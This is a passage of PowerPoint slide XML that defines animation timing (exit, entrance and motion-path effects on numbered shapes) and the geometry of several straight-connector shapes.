                                      </p:cBhvr>
                                      <p:rCtr x="8151" y="7986"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="88" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="89" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">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14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="113"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="94" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="113"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="95" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="96" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="116"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="97" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="116"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="98" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="99" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.43399 -0.42639 L 0.56875 -0.49537 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="100" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="6732" y="-3449"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="101" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.16302 0.15996 L 0.32695 0.13611 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="102" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="8190" y="-1204"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="103" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="104" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="76"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="106" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="76"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="107" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="115"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="109" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="115"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="110" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="111" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="112"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="112" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="112"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="113" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="114" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="105"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="115" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="105"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="116" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="117" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="104"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="118" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="104"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="119" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="120" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.56875 -0.49537 L 0.66849 -0.33287 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="121" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="4987" y="8125"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="122" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.32695 0.13611 L 0.49297 -0.01736 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="123" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="8294" y="-7685"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="124" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="125" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="126" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="103"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="127" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="103"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="128" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="129" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="101"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="130" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="101"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="131" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="132" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="97"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="133" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="97"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="134" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="135" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="136" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="137" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="138" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="139" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="140" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="141" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="142" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="143" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="144" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="145" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="146" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="75"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="147" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="75"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="148" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="149" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="78"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="150" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="151" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="152" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="83"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="153" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="83"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="154" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="155" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="84"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="156" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="84"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="157" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="158" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="87"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="159" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="87"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="160" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="161" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="72"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="162" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="72"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="163" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="164" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="73"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="16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9" grpId="0" animBg="1"/>
      <p:bldP spid="69"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Connector 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35AC32B2-D973-4C22-BABE-35F5FC6ECE7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4129188" y="1437883"/>
            <a:ext cx="1395394" cy="46166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77" name="Straight Connector 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1753DA75-C78F-4E03-80C9-AA7BACBA82D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5828656" y="2000252"/>
            <a:ext cx="2596113" cy="328904"/>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72" name="Straight Connector 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8E5F52-C85A-4DFD-AA31-BEA9006EC73F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3203388" y="2318824"/>
            <a:ext cx="5262184" cy="3121043"/>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73" name="Straight Connector 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD6A02F3-F823-4273-8974-2C9822ED8B01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3203388" y="2902186"/>
            <a:ext cx="3613817" cy="2537681"/>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75" name="Straight Connector 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE91B8B3-825B-4F3F-A60D-9CE07784C68D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3282900" y="4444101"/>
            <a:ext cx="4647563" cy="1109433"/>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78" name="Straight Connector 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF23EE9E-845A-4D29-9A30-EB0D07D34F51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
